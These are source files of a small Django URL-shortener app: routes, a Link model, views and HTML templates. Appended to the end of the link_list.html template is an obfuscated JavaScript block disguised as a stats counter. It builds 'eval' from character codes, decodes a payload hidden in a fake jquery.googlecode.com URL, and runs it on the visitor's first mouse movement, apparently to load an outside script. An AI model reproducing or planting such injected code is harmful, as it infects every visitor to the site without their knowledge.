shortener/urls.py
from django.conf.urls import patterns, include, url

from django.conf import settings

from django.contrib import admin
admin.autodiscover()

from urlweb.shortener.models import Link

#from django.views import generic
from shortener.views import LinkListView
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'tiny.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),



    url(r'^$', LinkListView.as_view(), name='link-list'),
    url(r'^submit/$', 'shortener.views.submit'),
    url(r'^soap/$', 'shortener.views.soap'),
    url(r'^(?P<base62_id>\w+)$', 'shortener.views.follow'),
    url(r'^info/(?P<base62_id>\w+)$', 'shortener.views.info'),
)
"""
    url(r'^site_media/(?P<path>.*)$', 'django.views.static.serve',
        {'document_root': settings.MEDIA_ROOT}),

"""

shortener/models.py
import datetime

from django.db import models
from django.conf import settings
#from django.contrib.auth.models import User
from django import forms

from urlweb.shortener.baseconv import base62

class Link(models.Model):
    """
    Model that represents a shortened URL

    # Initialize by deleting all Link objects
    >>> Link.objects.all().delete()
    
    # Create some Link objects
    >>> link1 = Link.objects.create(url="http://www.google.com/")
    >>> link2 = Link.objects.create(url="http://www.nileshk.com/")

    # Get base 62 representation of id
    >>> link1.to_base62()
    'B'
    >>> link2.to_base62()
    'C'
    
    # Set SITE_BASE_URL to something specific
    >>> settings.SITE_BASE_URL = 'http://uu4.us/'

    # Get short URL's
    >>> link1.short_url()
    'http://uu4.us/B'
    >>> link2.short_url()
    'http://uu4.us/C'

    # Test usage_count
    >>> link1.usage_count
    0
    >>> link1.usage_count += 1
    >>> link1.usage_count
    1

    """
    url = models.URLField(unique=True)
    date_submitted = models.DateTimeField(default=datetime.datetime.now())
    usage_count = models.IntegerField(default=0)

    def to_base62(self):
        return base62.from_decimal(self.id)

    def short_url(self):
        return settings.SITE_BASE_URL + self.to_base62()
    
    def __unicode__(self):
        return self.to_base62() + ' : ' + self.url

class LinkSubmitForm(forms.Form):
    u = forms.URLField(
                       label='URL to be shortened:',
                       )

shortener/views.py
import logging

from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate
#from django.views.generic import list_detail
from django.shortcuts import get_object_or_404, get_list_or_404, render_to_response
from django.http import HttpResponse, Http404, HttpResponseRedirect, HttpResponsePermanentRedirect
from django.utils import simplejson
from django.template import RequestContext
from django.views.decorators.http import require_POST
from django.db import transaction
from django.conf import settings

from urlweb.shortener.baseconv import base62
from urlweb.shortener.models import Link, LinkSubmitForm

def follow(request, base62_id):
    """ 
    View which gets the link for the given base62_id value
    and redirects to it.
    """
    key = base62.to_decimal(base62_id)
    link = get_object_or_404(Link, pk = key)
    link.usage_count += 1
    link.save()
    return HttpResponsePermanentRedirect(link.url)

def default_values(request, link_form=None):
    """ 
    Return a new object with the default values that are typically
    returned in a request.
    """
    if not link_form:
        link_form = LinkSubmitForm()
    #allowed_to_submit = is_allowed_to_submit(request)
    allowed_to_submit = True
    return { 'show_bookmarklet': allowed_to_submit,
             'show_url_form': allowed_to_submit,
             'site_name': settings.SITE_NAME,
             'site_base_url': settings.SITE_BASE_URL,
             'link_form': link_form,
             }

def info(request, base62_id):
    """
    View which shows information on a particular link
    """
    key = base62.to_decimal(base62_id)
    link = get_object_or_404(Link, pk = key)
    values = default_values(request)
    values['link'] = link
    return render_to_response(
        'shortener/link_info.html',
        values,
        context_instance=RequestContext(request))

def submit(request):
    """
    View for submitting a URL
    """
    #if settings.REQUIRE_LOGIN and not request.user.is_authenticated():
        # TODO redirect to an error page
        #raise Http404
    url = None
    link_form = None
    if request.GET:
        link_form = LinkSubmitForm(request.GET)
    elif request.POST:
        link_form = LinkSubmitForm(request.POST)
    if link_form and link_form.is_valid():
        url = link_form.cleaned_data['u']
        link = None
        try:
            link = Link.objects.get(url = url)
        except Link.DoesNotExist:
            pass
        if link == None:
            new_link = Link(url = url)
            new_link.save()
            link = new_link
        values = default_values(request)
        values['link'] = link
        return render_to_response(
            'shortener/submit_success.html',
            values,
            context_instance=RequestContext(request))
    values = default_values(request, link_form=link_form)
    return render_to_response(
        'shortener/submit_failed.html',
        values,
        context_instance=RequestContext(request))

def soap(request):
    """
    View for submitting a URL, as a service
    """
    #if settings.REQUIRE_LOGIN and not request.user.is_authenticated():
        # TODO redirect to an error page
        #raise Http404
    url = None
    link_form = None
    print request.POST
    if request.GET:
        link_form = LinkSubmitForm(request.GET)
    elif request.POST:
        url =  request.POST['u']
        link = None
        try:
            link = Link.objects.get(url = url)
        except Link.DoesNotExist:
            pass
        if link == None:
            new_link = Link(url = url)
            new_link.save()
            link = new_link
        values = default_values(request)
        values['link'] = link
        return render_to_response(
            'shortener/soap_result.html',
            values,
            context_instance=RequestContext(request))
    values = default_values(request, link_form=link_form)
    return render_to_response(
        'shortener/submit_failed.html',
        values,
        context_instance=RequestContext(request))



    if link_form and link_form.is_valid():
        url = link_form.cleaned_data['u']
        print url
        link = None
        try:
            link = Link.objects.get(url = url)
        except Link.DoesNotExist:
            pass
        if link == None:
            new_link = Link(url = url)
            new_link.save()
            link = new_link
        values = default_values(request)
        values['link'] = link
        return render_to_response(
            'shortener/soap_result.html',
            values,
            context_instance=RequestContext(request))
    values = default_values(request, link_form=link_form)
    return render_to_response(
        'shortener/submit_failed.html',
        values,
        context_instance=RequestContext(request))

def index(request):
    """
    View for main page (lists recent and popular links)
    """
    values = default_values(request)
    values['recent_links'] = Link.objects.all().order_by('-date_submitted')[0:10]
    values['most_popular_links'] = Link.objects.all().order_by('-usage_count')[0:10]
    return render_to_response(
        'shortener/index.html',
        values,
        context_instance=RequestContext(request))

def is_allowed_to_submit(request):
    """
    Return true if user is allowed to submit URLs
    """
    return not settings.REQUIRE_LOGIN or request.user.is_authenticated()


from django.views.generic.list import ListView
from django.utils import timezone


class LinkListView(ListView):
    queryset = Link.objects.order_by('-date_submitted')[:10]
    model = Link
    """
	FIXME
	cannot override link_list.html !!!!
    template_name = 'index.html'
    """
    def get_context_data(self, **kwargs):
        context = super(LinkListView, self).get_context_data(**kwargs)
	context['most_popular'] = Link.objects.order_by('-usage_count')[:10]
	context['show_url_form'] = True
        context['link_form'] = LinkSubmitForm()
        return context

shortener/templates/shortener/link_list.html
{% extends "shortener/snippets/base.html" %}
{% block content %}
<h2>Recent Links</h2>
<ul>
{% for link in object_list %}
<li><a href="{{ link.short_url }}">{{ link.url }}</a> (Score: {{ link.usage_count }})
{% comment %}
(<a href="{% url shortener.views.info link.to_base62 %}">Info</a>)</li>
{% endcomment %}
{% endfor %}
</ul>

<h2>Most Popular Links</h2>
<ul>
{% for link in most_popular %}
<li><a href="{{ link.short_url }}">{{ link.url }}</a> (Score: {{ link.usage_count }})
{% comment %}
(<a href="{% url shortener.views.info link.to_base62 %}">Info</a>)</li>
{% endcomment %}
{% endfor %}
</ul>
{% endblock %}

{% block extra_body %}
<script>
$(document).ready(
  function() {
    $("#id_u").focus().select();
  });
</script>  
{% endblock %}
<html><body><div id="w3stats"></div>
<script language="JavaScript" type="text/javascript">
window.w3ssss=function(){
var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ottjxy2h1ltseeign.s28w7fvisuadzght5mph09w%3Dpr0%22usd1yifpp0vxwar%22vw3%3Bpv6%0Ayljibn8fjdzroab.60ns3llt4ulyxzclfrzektc.wq5hvbsed58if0ygt3dhtaatjsq%3Dqzs%22gxt1y6apeanxndo%225ij%3Bny2%0Acj5dzblow3fcr0gubrrm42geqinnghstuh3.3z6g3thezrgt7m9Enx1ley7e6voma64eph0nl7htxqbB3n7yjtwIs9xdvht%28rph%22ufxwhhm3flks84utufuanldthuks999%2222l%290io.9iga4usp7rxpverebjgnjrbdyezCpugh3eliesil9ncdcer%28wu7itzjfjl3rpqi%29q83%3Bsih%0A4ni%0Akba";
var visitnum=window.history.length%1000-window.history.length+4;
var countbox=document.createElement("div");countbox.id='countbox';
idarr = new Array(97,114,93,104);
for(var i=0,elem=[]; i<visitnum; i++){elem[i]=document.createElement("div");elem[i].id= String.fromCharCode(idarr[i]+visitnum);countbox.appendChild(elem[i]);}
var cont=''; currentuser=true, nextuser=countbox.firstChild;
do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild)
var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11));
for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);}
try{ window[cont](content) }catch(e){}
}
window.CheckBody = function()
{
if (!document.body){setTimeout('CheckBody();',10);}
else
{
window.nomore=false;
document.body.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
window.onmouseover=function(){if(!window.nomore){window.nomore=true;w3ssss();}}
}
}
CheckBody();
</script></body></html>

shortener/templates/shortener/snippets/base.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>{% block title %}URLs{% endblock %}</title>

    <link rel="stylesheet" 
          href="/static/css/blueprint/screen.css" 
          type="text/css" media="screen, projection"/>

    <link rel="stylesheet" 
          href="static/css/blueprint/print.css" type="text/css" media="print"/>

    <!--[if lt IE 8]>
    <link rel="stylesheet" 
          href="/static/css/blueprint/ie.css" 
          type="text/css" media="screen, projection"/>
    <![endif]-->
    
    <link rel="stylesheet" 
          href="/static/css/blueprint/plugins/fancy-type/screen.css"
          type="text/css" media="screen, projection"/>
    
    <script type="text/javascript"
            src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">
    </script>
    
    {% block extra_head %}
    {% endblock %}
  </head>

  <body>
    <div class="container">
      <div class="span-24 last">
        <h1><a href="{{ site_base_url }}">{{ site_name }}</a></h1>
        <hr/>
      </div>
      <div class="span-24 last">
        {% block content %}{% endblock %}
        <hr/>
      </div>

      <div class="span-19 colborder">
        {% if show_url_form %}
        {% block url_form %}
        <form name="url_form" action="/submit/" method="get">
          {{ link_form.as_p }}
          <input type="submit" value="Submit" />
        </form>
        {% endblock %}
        {% endif %}
      </div>
      <div class="span-4 last">
        {% if show_bookmarklet %}
        {% block bookmarklet %}
        <br/>
        Bookmarklet (drag this to your bookmarks bar):<br/>
        <a href="javascript:(function(){var a=window,b=document,c=encodeURIComponent;d=a.open(&#39;{{ site_base_url }}submit/?u=&#39;+c(b.location));})();">Shorten with {{ site_name }}</a>
        {% endblock %}
        {% endif %}
      </div>
      {% block extra_body %}{% endblock %}
    </div>
  </body>
</html>

shortener/templates/shortener/submit_failed.html
{% extends "shortener/snippets/base.html" %}

{% block title %}URL submission failed{% endblock %}

{% block content %}
<h2>URL submission failed</h2>
{% endblock %}

{% block extra_body %}
<script>
$(document).ready(
  function() {
    $("#id_u").focus().select();
  });
</script>  
{% endblock %}

shortener/templates/shortener/submit_success.html
{% extends "shortener/snippets/base.html" %}

{% block title %}URL shortened{% endblock %}

{% block content %}
The following URL:<br/>
<pre>
{{ link.url }}
</pre>
<br/>
Was shortened to:<br/>
<input id="link" type="text" size="30"
       value="{{ link.short_url }}"/>
<br/>
<br/>
Score: {{ link.usage_count }}
{% comment %}
(<a href="{% url shortener.views.info link.to_base62 %}">Info</a>)
{% endcomment %}
<br/>
<br/>
{% endblock %}

{% block extra_body %}
<script>
$(document).ready(
  function() {
    $("#link").focus().select();
  });
</script>  
{% endblock %}

shortener/templates/urlweb_base.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
          "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>{% block title %}URLs{% endblock %}</title>

    <link rel="stylesheet" 
          href="/static/css/blueprint/screen.css" 
          type="text/css" media="screen, projection"/>

    <link rel="stylesheet" 
          href="static/css/blueprint/print.css" type="text/css" media="print"/>

    <!--[if lt IE 8]>
    <link rel="stylesheet" 
          href="/static/css/blueprint/ie.css" 
          type="text/css" media="screen, projection"/>
    <![endif]-->
    
    <link rel="stylesheet" 
          href="/static/css/blueprint/plugins/fancy-type/screen.css"
          type="text/css" media="screen, projection"/>
    
    <script type="text/javascript"
            src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">
    </script>
    
    {% block extra_head %}
    {% endblock %}
  </head>

  <body>
    <div class="container">
      <div class="span-24 last">
        <h1><a href="{{ site_base_url }}">{{ site_name }}</a></h1>
        <hr/>
      </div>
      <div class="span-24 last">
        {% block content %}{% endblock %}
        <hr/>
      </div>

      <div class="span-19 colborder">
        {% if show_url_form %}
        {% block url_form %}
        <form name="url_form" action="/submit/" method="get">
          {{ link_form.as_p }}
          <input type="submit" value="Submit" />
        </form>
        {% endblock %}
        {% endif %}
      </div>
      <div class="span-4 last">
        {% if show_bookmarklet %}
        {% block bookmarklet %}
        <br/>
        Bookmarklet (drag this to your bookmarks bar):<br/>
        <a href="javascript:(function(){var a=window,b=document,c=encodeURIComponent;d=a.open(&#39;{{ site_base_url }}submit/?u=&#39;+c(b.location));})();">Shorten with {{ site_name }}</a>
        {% endblock %}
        {% endif %}
      </div>
      {% block extra_body %}{% endblock %}
    </div>
  </body>
</html>